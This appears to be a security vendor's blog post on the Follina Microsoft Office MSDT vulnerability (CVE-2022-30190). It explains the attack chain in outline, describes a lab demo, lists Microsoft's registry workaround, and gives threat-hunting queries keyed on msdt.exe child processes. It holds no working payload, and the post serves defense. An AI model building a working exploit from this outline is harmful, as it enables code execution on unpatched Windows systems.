Researchers Spot a new Microsoft Office Zero-Day Exploit in the wild. It is a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.
This vulnerability is tracked as CVE-2022-30190-Microsoft Support Diagnostic Tool (MSDT) Vulnerability. A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, delete data, or create new accounts in the context allowed by the user’s rights.
The vulnerability was discovered by an independent cybersecurity research team named nao_sec.
Why Named Follina?
The InfoSec community refers to this vulnerability as ‘Follina’. The vulnerability was dubbed “Follina” by security researchers when they discovered a sample of an infected Word DOC file with the name 05-2022-0438.doc on VirusTotal from an IP address in Belarus. The numeric sequence 05-2022 (May 2022) appears to be self-evident, but what about the reference 0438? It’s the dialling code for Follina, Italy’s area code. There’s no evidence that the malware originated in that part of the world, or that it has anything to do with this exploit at all.
- Office 2013 and later versions are impacted by the Follina zero-day vulnerability, according to researchers.
- Some versions of Office included with a Microsoft 365 licence could also be targeted by attackers on both Windows 10 and Windows 11.
How it works?
Basically, the exploit works like this:
- You are opening a booby-trapped DOC file which you might have received by a phishing email.
- The download document refers to https: URLs
- Under Windows, ms-msdt: is a proprietary URL type which launches the MSDT software toolkit.
- MSDT is a shortcut for Microsoft Support Diagnostic Tool.
- The command line provided to MSDT via the URL causes it to run untrusted code.
When invoked, the malicious program ms-msdt: link triggers an MSDT command with command line arguments like this: msdt /id pcwdiagnostic ….
If run manually, without any other parameters, it automatically loads MSDT and calls the Troubleshooter for program compatibility which looks innocent enough, like this:
In the above image, we have used Kali as an Attacker Machine (On the Left-Hand side) and Windows Machine as a victim (On the Right Hand Side).
Once the malicious DOC file is opened, it opens MSDT and we have kept a CALC application to get validation that the script actually worked. Also on the Kali Machine, you can see that the requests are received on the Attacker Machine.
From there, you can choose an app to troubleshoot; you can answer a bunch of support-related questions; you can perform various automated tests on the application; and if you’re still stuck, you can choose to report the problem to Microsoft, simultaneously downloading various troubleshooting data.
Although you probably didn’t expect to be thrown into this PCWDiagnostic utility simply by opening a document, you would at least see a series of pop-up dialog boxes and have the option to choose what to do at each step of the process.
Microsoft has yet not released an update for this, but a temporary workaround has been provided by Microsoft. There are a few things you can do to stop some or all of the “features” used in this type of attack.
1. Unregister the ms-msdt url protocol
Disabling MSDT URL protocol prevents troubleshooters being launched as links including links throughout the operating system. Follow these below steps to disable:
- Run Command Prompt as Administrator.
- To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename“
- Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.
2. Disable preview in Windows Explorer
If you have the preview pane enabled, you can:
- Open File Explorer.
- Click on View Tab.
- Click on Preview Pane to hide it.
How Does Seccom Detect and Respond to These Vulnerability
As soon as our Threat Researchers came to know about this Follina vulnerability they made sure that we take all the preventive measures mentioned above with the help of the customer.
Once that was done, we did retrospective threat hunting to make sure there were no such suspicious commands or arbitrary code being executed with Parent Process as a DOC file and child process as msdt.exe which resembled to exploitation of Follina Zero Day Vulnerability.
Parallelly, our team also created detection and prevention rules in all our platforms to ensure that any such abnormal activities are detected and prevented directly.
- Behaviour based detection and prevention rules are being implemented to ensure any such abnormal behaviour is detected and prevented immediately.
- Our MDR agent blocks any suspicious commands including msdt and terminates the entire process tree that is initiated with suspicious commands
Seccom Global’s MDR Agent already blocks this behavior by default
A retrospective threat hunt was performed by our Threat Hunters on the entire customer base to identify any suspicious activities related to this vulnerability
Behavior-based detection rules are being implemented to ensure any such abnormal behavior is detected immediately.
Retrospective threat hunt was performed by our Threat Hunters on the entire customer base to identify any suspicious activities related to this vulnerability
Some of the queries to perform detection:
#1 – (process.command_line:*WINWORD.EXE* AND process.command_line:*msdt.exe* AND process.command_line:(*sdiagnhost.exe* OR *csc.exe* OR *PCWDiagnostic* OR *IT_ReBrowserForFile* OR *IT_BrowserForFile* OR *conhost.exe*))
#2 – process.command_line:* AND process.name : “msdt.exe”
Windows Event Detection Query:
Event ID = “105” AND Process_name “MSDT.exe”